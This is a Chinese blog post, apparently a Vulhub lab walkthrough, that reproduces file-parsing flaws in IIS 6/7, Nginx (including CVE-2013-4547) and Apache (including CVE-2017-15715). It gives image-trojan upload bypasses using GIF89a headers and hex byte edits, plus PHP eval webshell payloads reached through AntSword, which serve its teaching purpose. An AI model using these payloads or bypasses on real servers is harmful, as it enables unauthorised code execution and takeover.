中间件解析了漏洞【IIS Nginx Apache】

最新推荐文章于 2024-09-05 22:48:27 发布
最新推荐文章于 2024-09-05 22:48:27 发布
阅读量296 收藏 2
点赞数 2
文章标签: nginx apache 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65852138/article/details/141938967
版权

IIS

1.IIS6.X

1.使用Windows2003虚拟机,在其中安装IIS6.X

2.在IIS6.X中,.asp文件夹中的文件都会被当作asp文件去执行

我们在网站根目录创建一个x.asp文件

在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码。 

在外部浏览器中访问windows2003的iis网站中的2.jpg 发现asp代码被执行 

2.IIS7.X

1.php.ini⾥的cgi.fix_pathinfo=1 开启,把前面的分号去掉就算开启了

2.IIS7在Fast-CGI运⾏模式下

3.将PHP⼀句话木马写到1.php并更改后缀为1.jpg上传到⽬标站点...利⽤解析漏洞进行访问

4.蚁剑连接

Nginx

1.nginx_parsing

1.在kali中开启vluhub靶场

在vluhub中找到Nginx中的靶场,运行docker-compose文件就是开启靶场

docker-compose up -d

2.运行docker-compose ps -a查看进程

3.访问

4.制作图片马进行上传,并获取木马地址

GIF89a是图片标识,如果不加会导致网站不认可我们的jpg文件

注意:cmd要加上引号

5.访问我们的图片马

访问不到我们的一句话木马,那么我们就要在目录后面加上.php让网站将我们的文件进行php解析

6.蚁剑连接

2.CVE-2013-4547 

1.开启环境,同上

2.访问靶机

3.上传文件shell.php,抓包,将php改为jpg并在jpg后面加上两个空格和.php

4.在Hex中将第二个空格改为00

5.放行,上传成功

6.访问这个shell.jpg并进行抓包,将get后面参数加上两个空格,和.php

7.在hex中依旧将第二个空格改为00

Apache

1.apache_parsing

1.开启靶机

2.访问靶机并上传 shell.php.jpg 文件,文件内容为GIF89a
<?php fputs(fopen("shw.php","w"),"<?php eval(\$_POST['cmd']);?>")?>

3.蚁剑连接

2.CVE-2017-15715

 1。开启靶机

2.访问靶机并上传 shell.jpg 文件,文件内容为GIF89a
<?php @eval($_POST['cmd']);?>,filename为1.php

3.抓包,在php后面加上空格,并把hex中的空格改为0a

 

4.放行访问1.php%0A

5,蚁剑连接

Zhong-Xin
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ran的博客
05-13 2731
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
【网络安全】网站中间件存在的解析漏洞
m0_67401761的博客
07-28 1873
解析漏洞主要说的是一些特殊文件被IISApacheNginx中间件在某种情况下被解释成脚本文件格式的漏洞。通俗来说就是,对文件解析有特定限制,但是存在漏洞,可以绕过限制上传任意文件的一种过程。...
Apache/IIS/Nginx中间件解析漏洞
sGanYu
12-07 7455
目录 IIS5.x/6.0解析漏洞 Apache解析漏洞 Nginx解析漏洞 IIS7.5解析漏洞 IIS5.x/6.0解析漏洞 使用iis5.x-6.x版本的服务器大多为windows server 2003,由于网站比较古老,开发语句一般为asp,该解析漏洞只能解析asp文件,而不能解析aspx文件,得安装.net框架 目录解析(6.0) 形式:www.xxx.com/xx.asp/xx.jpg 原理:服务器会默认把asp,asa目录下的文件都解析成asp文件 例如创建一个文件夹,将
ApacheNginxIIS文件解析漏洞
qq_68163788的博客
05-29 1200
文件解析漏洞是指在Web服务器(如ApacheNginxIIS)中存在的一种安全漏洞,攻击者可以利用该漏洞来执行恶意代码或获取敏感信息。这种漏洞通常涉及服务器错误地解释用户输入的文件或数据,导致攻击者能够访问服务器上的文件系统、执行任意代码或进行其他未经授权的操作。攻击者通常会尝试通过构造特定的恶意请求来利用文件解析漏洞,从而绕过服务器的安全控制机制。
文件解析漏洞总结(IISNGINXAPACHE
2301_76631050的博客
07-30 1073
这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将 /xx.jpg/xx.php 解析为 php 文件。在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。.jpg会被服务器看成是1.asp。
【网络安全 --- web服务器解析漏洞IISApacheNginx中间件常见解析漏洞
m0_67844671的博客
11-06 3955
【网络安全 --- web服务器解析漏洞IISApacheNginx中间件常见解析漏洞,讲解了中间件的常见解析漏洞及修复方案
Tomcat、ApacheNginxIIS、Weblogic中间件等保测评作业指导书V1.1
07-26
等保常见中间件测评指导书(供参考),也可作为中间件加固参考使用
中间件解析漏洞
土拨鼠挖洞中的博客
10-04 5450
  IIS IIS解析漏洞 IIS 6.0解析利用方法有两种: 1:文件解析IIS6.0下,分号,冒号后面的不被解析,也就是说 wooyun.asp;123.jpg会被服务器看成是wooyun.asp 以下格式也会被解析:*.asa、*.asp,*.cer;*.cdx   2:目录解析 当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件...
中间件合集(包含常用IISNginxApache等).pdf
04-11
Web中间件常见问题,一个集合
信也科技基于 Apache SeaTunnel金融场景的应用实践探索
weixin_54625990的博客
09-05 419
作者:朱俊,信也科技,数据开发专家离线开发一直是数据仓库建设中重要的一个环节。信也科技之前基于Azkaban构建了离线任务调度与开发平台,承载了公司90%以上的离线任务调度需求,以及玄策变量平台的每日变量跑批产出任务。随着时间的积累,任务量级越来越大,Azkaban难以运维与二次开发等问题日渐凸显,给技术同学带来不小的负担。从2023年下半年开始,借助内部创新项目的机会,开展了调度系统引擎升级的项目立项与调研,希望在新调度系统的基础上,进一步规范任务开发流程,提高运维效率,简化全链路血缘。
Apache ShardingSphere数据分片弹性伸缩加解密中间件
纸上得来终觉浅,绝知此事要躬行
09-05 756
Apache ShardingSphere 是一款分布式 SQL 事务和查询引擎,可通过数据分片、弹性伸缩、加密等能力对任意数据库进行增强。ShardingSphere是一套开源的分布式数据库中间件解决方案组成的生态圈,它由Sharding-JDBC、Sharding-Proxy和Sharding-Sidecar(计划中)这3款相互独立的产品组成。 他们均提供标准化的数据分片、分布式事务和数据库治理功能,可适用于如Java同构、异构语言、云原生等各种多样化的应用场景。
Apache Guacamole 安装及配置VNC远程桌面控制
心若有所向往,何惧道阻且长。
09-05 400
Apache Guacamole 是一个开源的远程桌面网关,可以通过浏览器访问各种远程桌面协议。它由 Apache 软件基金会维护,主要功能是提供一个无需客户端插件的 Web 访问解决方案。
Apache 配置与应用
最新发布
2401_83958584的博客
09-05 134
有了授权用户账号以后,还需要修改 httpd.conf配置文件,在特定的目录区域中添加授权配置,以启用基本认证并设置允许哪些用户访问。Require [not] ip <IP 地址或网段列表>:允许或拒绝指定 IP 地址网络访问。Require [not]host<主机名或域名列表>:允许或拒绝指定主机或域名访问。require valid-user:要求只有认证文件中的合法用户才能访问。htpd 的基本认证通过校验用户名、密码组合来判断是否允许用户访问。Require local:仅允许本地主机访问。
uniapp交互反馈
a1241436267的博客
09-05 622
可能会导致加载提示框无法正常隐藏。确保只在必要的地方调用。来提高用户体验,确保用户在等待过程中得到及时反馈。除了使用系统提供的还可以使用自定义图标。: 如果在同一个异步操作中多次调用。通过这种方式,可以有效地使用。调用来隐藏加载提示框。以下是不同值的效果图。
【FFMPEG】Install FFmpeg CUDA gltransition in Ubuntu
RockWang的博客
09-05 110
FFMPEG gltranlations CUDA
关于进程的那些事——认识进程(包含环境变量的一些描述)
2301_80148295的博客
09-03 699
僵尸进程和孤儿进程的区别:僵尸进程子进程先于父进程退出。孤儿进程父进程先于子进程退出 为什么要配置环境变量:方便程序执行,直接通过配置的环境变量来搜索可执行程序。设置特定的环境变量可以设置程序的参数。创建子进程之后会将父进程的环境变量自动传给子进程
Nginx 平滑升级指南
XMYX-0
09-04 463
Nginx 的平滑升级是一种无中断的升级方式,能够在不影响现有连接的情况下,将 Nginx 从旧版本升级到新版本。
使⽤docker部署project-exam-system(2)
ln2915275834的博客
09-03 733
称|id:/usr/local/etc/haproxy/haproxy.务,⽽且nginx容器还需要指定名称,web0 web1 web2因为。haproxy代理,创建三个nginx容器,创建⼀个haproxy服。/root/pes/haproxy/haproxy.cfg 容器名。如果没有名称,那么容器就⽆法被haproxy --link。2. 创建⼀个haproxy,将配置⽂件导⼊到容器,在容器。3. 实际的使⽤haproxy容器,只需要将配置⽂件挂载到。
ApacheNginxIIS中间件 存在哪些解析漏洞
03-25
ApacheNginxIIS中间件存在许多不同的解析漏洞,以下是其中一些常见的漏洞: 1. Apache - CVE-2019-0211:存在漏洞可允许攻击者在服务器上执行任意代码 - CVE-2019-0196:存在漏洞可允许攻击者通过目标Web服务器上的缓存发起分布式拒绝服务攻击 - CVE-2017-5638:存在漏洞可允许攻击者通过发送带有恶意代码的HTTP请求来远程执行任意代码 2. Nginx - CVE-2019-11043:存在漏洞可允许攻击者发送包含空字节的请求来执行任意代码,从而导致拒绝服务攻击 - CVE-2017-7529:存在漏洞可允许攻击者通过发送带有长的URI的请求来导致拒绝服务 3. IIS - CVE-2017-7269:存在漏洞可允许攻击者通过发送特殊构造的请求来远程执行任意代码 - CVE-2015-1635:存在漏洞可允许攻击者通过向目标系统发送特殊构造的请求来实现拒绝服务攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值